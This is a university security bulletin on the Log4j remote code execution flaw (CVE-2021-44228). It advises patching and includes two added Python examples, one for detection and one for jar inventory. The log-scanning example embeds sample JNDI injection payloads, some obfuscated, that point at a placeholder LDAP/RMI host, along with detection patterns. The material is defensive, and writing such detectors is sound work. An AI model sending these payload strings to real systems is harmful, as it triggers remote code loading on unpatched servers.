IT Professionals:
The University Information Security Office (UISO) updated their security bulletin regarding the Critical Remote Code Execution Vulnerability in Log4j [1]. As of today, the UISO recommends that all system/application owners immediately patch to log4j 2.16.0+. There are no known, reliable workarounds at this time. Those who are unable to patch should restrict access to systems via host-based or data center firewalls until patches can be applied. Please contact the UISO directly if you are unable to patch.
Thank you for your partnership in keeping IU secure.
–IT Community Partnerships on behalf of the University Information Security Office
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The most recent version of this bulletin can be found online at the Information Security website[1].
Title
Critical Remote Code Execution Vulnerability in Log4J
Update: As of December 15th, the UISO recommends that users patch to log4j v2.16.0+. There are no other known workarounds at this time; users who are unable to patch should restrict access to systems via host-based or data center firewalls until patches can be applied. Please contact the UISO if you are unable to patch at this time.
Background
On December 9, 2021, a critical remote code execution vulnerability was publicly disclosed affecting multiple versions of the open-source Apache Log4j logging framework. This vulnerability has been assigned CVE-2021-44228.
Impact
Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. These may include commercial applications, locally developed applications, and cloud services. IT Pros can identify whether their systems are affected by examining the log files of any services that use Log4j. Logs containing client-controlled strings such as user-agent values, URL strings, or form field submissions are potentially vulnerable. The presence of ‘jndi’ strings in log events may indicate attempts at exploitation.
Examples include: ‘jndi:ldap:/’, ‘jndi:rmi:/’, ‘jndi:ldaps:/’, or ‘jndi:dns:/’. Note that this is not an exhaustive list.
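The following Python script is an added illustration of the log review described above; it is not part of the UISO bulletin. It scans web-server style log lines for the ‘${jndi:…}’ lookup strings the bulletin names, and it first collapses the nested ‘${lower:…}’ / ‘${upper:…}’ lookups that are commonly used to split the keyword apart (an assumption about attacker behaviour, not something the bulletin states). The log lines, IP addresses and hostnames are constructed for the example; a plain mention of the word "jndi" in a URL path is deliberately included to show that only lookup syntax is flagged.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines (not real traffic). Hosts use reserved
# example names. Line 5 contains the word "jndi" without lookup syntax
# and must not be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:05 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://scanner.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /?q=${jndi:rmi://scanner.example/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "POST /form HTTP/1.1" 200 10 "-" "${${lower:j}ndi:${lower:l}daps://scanner.example/c}"',
    '10.0.0.7 - - [10/Dec/2021:10:02:00 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

# Innermost ${lower:x} / ${upper:x} lookups with no further nesting inside.
# Other lookup forms exist; this normalisation is illustrative, not exhaustive.
NESTED_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)

# A JNDI lookup: "${jndi:<scheme>:" with optional whitespace. The scheme is
# captured so findings can be grouped (ldap, ldaps, rmi, dns, ...).
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Repeatedly unwrap ${lower:..}/${upper:..} until the text stops changing."""
    previous = None
    while previous != text:
        previous = text
        text = NESTED_CASE_LOOKUP.sub(lambda m: m.group(1), text)
    return text


@dataclass
class Finding:
    line_no: int   # 1-based index into the scanned input
    scheme: str    # lower-cased JNDI scheme, e.g. "ldap"
    raw: str       # the original, un-normalised log line


def scan_lines(lines) -> list:
    """Return one Finding per JNDI lookup found in the (normalised) lines."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(normalize(line)):
            findings.append(Finding(line_no, match.group(1).lower(), line))
    return findings


def scheme_counts(findings) -> dict:
    """Summarise findings by scheme, useful for a quick incident report."""
    counts = {}
    for f in findings:
        counts[f.scheme] = counts.get(f.scheme, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_lines(SAMPLE_LOGS)
    for f in results:
        print(f"line {f.line_no}: jndi scheme={f.scheme}: {f.raw}")
    print("summary:", scheme_counts(results))
```

To run it over a real file, replace SAMPLE_LOGS with an iterator over the file's lines; any finding should be treated as an exploitation attempt and handled through the incident response steps in the next paragraph, regardless of whether the request appears to have succeeded.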
Upon identification of exploitation attempts, immediately initiate incident response procedures and notify the University Information Security Office (UISO) via it-incident@iu.edu.
Platforms Affected
The vulnerability impacts Apache Log4j versions 2.0 to 2.15; 1.x versions are no longer supported and may also be vulnerable. Any service or application using the log4j framework to write log data to disk may be at risk and should be evaluated.
For a comprehensive list please see: https://github.com/cisagov/log4j-affected-db.
Local Observations
The UISO has observed local exploitation of this vulnerability. CISA has observed numerous threat actors engaged in widespread Internet-based exploitation of this vulnerability.
UISO Recommendations
Admins must patch to log4j 2.16.0 or newer. For commercial products, install vendor-supplied updates; if no updates are available, inquire with vendor support as soon as possible and restrict access to systems via host-based or data center firewalls until patches can be applied. Mitigations for versions earlier than 2.15 are not effective.
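As an added example (not part of the UISO bulletin or any vendor tooling), the script below inventories log4j-core jars on a host and reports which ones fall below the 2.16.0 floor the bulletin requires. It reads the version from the Maven pom.properties entry that log4j-core jars carry, falls back to the file name, and also notes jars laid out as log4j 1.x, which the bulletin says is unsupported. The jar used in the demonstration is constructed in memory with placeholder contents; the class and property paths are the real ones used by Log4j, but the version numbers in the demo are chosen for illustration.

```python
import io
import re
import zipfile
from pathlib import Path

MIN_SAFE_VERSION = (2, 16, 0)  # bulletin: patch to log4j 2.16.0 or newer
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
LOG4J2_CORE_PREFIX = "org/apache/logging/log4j/core/"
LOG4J1_MARKER = "org/apache/log4j/Logger.class"   # log4j 1.x class layout


def parse_version(text: str):
    """Turn '2.14.1' (or '2.16') into a comparable tuple; None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def inspect_jar(jar, display_name: str = "") -> dict:
    """Classify one jar (path or file-like object) against the 2.16.0 floor."""
    with zipfile.ZipFile(jar) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1].strip())
        if version is None:
            # Fall back to the log4j-core-<version>.jar naming convention.
            m = re.search(r"log4j-core-(\d+\.\d+(?:\.\d+)?)", display_name)
            if m:
                version = parse_version(m.group(1))
        is_core = POM_PROPS in names or any(n.startswith(LOG4J2_CORE_PREFIX) for n in names)
        is_log4j1 = LOG4J1_MARKER in names
    return {
        "name": display_name,
        "log4j2_core": is_core,
        "log4j1": is_log4j1,
        "version": version,
        "jndi_lookup_present": JNDI_CLASS in names,
        # Unknown version on a log4j-core jar is treated as needing patching.
        "needs_patch": (is_core and (version is None or version < MIN_SAFE_VERSION)) or is_log4j1,
    }


def scan_tree(root: Path) -> list:
    """Walk a directory and inspect every .jar found; unreadable jars are skipped."""
    results = []
    for path in root.rglob("*.jar"):
        try:
            results.append(inspect_jar(path, display_name=str(path)))
        except zipfile.BadZipFile:
            continue
    return results


def build_demo_jar(version: str, include_jndi: bool = True) -> io.BytesIO:
    """Constructed stand-in for a log4j-core jar; contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # not a real class file
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for v in ("2.14.1", "2.15.0", "2.16.0", "2.17.1"):
        report = inspect_jar(build_demo_jar(v), display_name=f"demo-log4j-core-{v}.jar")
        status = "PATCH REQUIRED" if report["needs_patch"] else "ok"
        print(f'{report["name"]}: version={report["version"]} -> {status}')
```

Run scan_tree(Path("/opt")) or similar on a server and triage every entry with needs_patch set; application servers often bundle jars inside .war or .ear archives, which this example does not unpack, so treat a clean result from it as a starting point rather than proof that a host is unaffected.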
Workarounds
There are no known reliable workarounds at this time. If you or your vendor are unable to patch, please contact UISO.
Further Reading
[1] https://informationsecurity.iu.edu/security-bulletins/bulletins-2021-12-10-log4j-remote-code-execution.html
[2] https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
[3] https://www.lunasec.io/docs/blog/log4j-zero-day/
[4] https://www.randori.com/blog/cve-2021-44228/
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
[6] https://logging.apache.org/log4j/2.x/